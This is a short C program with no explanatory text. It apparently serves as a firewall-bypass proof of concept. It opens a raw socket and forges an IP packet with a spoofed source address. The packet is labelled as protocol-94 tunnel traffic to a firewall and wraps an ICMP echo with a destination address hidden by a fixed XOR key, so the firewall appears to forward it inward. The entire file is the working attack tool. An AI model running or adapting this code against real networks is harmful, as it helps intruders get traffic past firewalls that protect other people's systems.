#define _BSD_SOURCE

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

#define TUNNELPROTO 94

static u_short calc_sum(u_short start, u_short *buff, int len)
{
  u_long sum = start;

  while (len--)
    sum += *buff++;

  sum = (sum >> 16) + (sum & 0xffff);
  sum = (sum >> 16) + (sum & 0xffff);

  return sum;
}

static void usage()
{
  fprintf(stderr, "usage: icmp fw-address local-address destination-address ttl\n");
}

int main(int ac, char *av[])
{
  int i, s, res, true = 1;
  unsigned char dgram[100];
  struct ip *iph;
  struct icmp *icmph;
  char *data;
  unsigned char *magic;
  struct sockaddr_in daddr;
  unsigned long fwadr, ladr, dadr;
  int ttl;
  unsigned char xor[5] = {
    0xe0, 0x63, 0x5a, 0x06, 0xc8
  };

  if (ac != 5) {
    usage();
    return 1;
  }

  if ((fwadr = inet_addr(av[1])) == (unsigned long)-1) {
    fprintf(stderr, "invalid fw address given\n");
    usage();
    return 1;
  }

  if ((ladr = inet_addr(av[2])) == (unsigned long)-1) {
    fprintf(stderr, "invalid local address given\n");
    usage();
    return 1;
  }

  if ((dadr = inet_addr(av[3])) == (unsigned long)-1) {
    fprintf(stderr, "invalid destination address given\n");
    usage();
    return 1;
  }

  if (!(ttl = atoi(av[4]))) {
    fprintf(stderr, "invalid ttl given\n");
    usage();
    return 1;
  }

  if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    perror("socket");
    res = 2;
  } else {
    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &true, sizeof(true)) < 0) {
      perror("setsockopt");
      res = 3;
    } else {
      memset(&daddr, 0, sizeof (daddr));
      daddr.sin_family = AF_INET;
      daddr.sin_addr.s_addr = fwadr;
      
      memset(dgram, 0, sizeof (dgram));

      iph = (struct ip *)&dgram[0];
      icmph = (struct icmp *)&iph[1];
      data = (char *)&icmph[1];

      strcpy(data, "0123456789");

      for (magic = (unsigned char *)data; *magic; magic++);

      for (i = 0; i < 4; i++)
	magic[i] = ((unsigned char *)&dadr)[i] ^ xor[i];

      magic[4] = IPPROTO_ICMP ^ xor[4];

      icmph->icmp_type = ICMP_ECHO;
      icmph->icmp_code = 0;
      icmph->icmp_id = 0;
      icmph->icmp_seq = 0;

      icmph->icmp_cksum = 0;
      icmph->icmp_cksum = ~calc_sum(0, (u_short *)icmph, 9);

      iph->ip_v = IPVERSION;
      iph->ip_hl = 5;
      iph->ip_tos = 0;
      iph->ip_len = htons(&magic[5] - dgram);
      iph->ip_id = htons(1);
      iph->ip_off = htons(0);
      iph->ip_ttl = ttl;
      iph->ip_p = TUNNELPROTO;
      iph->ip_src.s_addr = ladr;
      iph->ip_dst.s_addr = fwadr;

      iph->ip_sum = 0;
      iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);

      if (sendto(s, &dgram, &magic[5] - dgram, 0, (struct sockaddr *)&daddr,
		 sizeof(daddr)) < 0) {
	perror("sendto");
	res = 4;
      } else
	res = 0;

      close(s);
    }
  }

  return res;
}
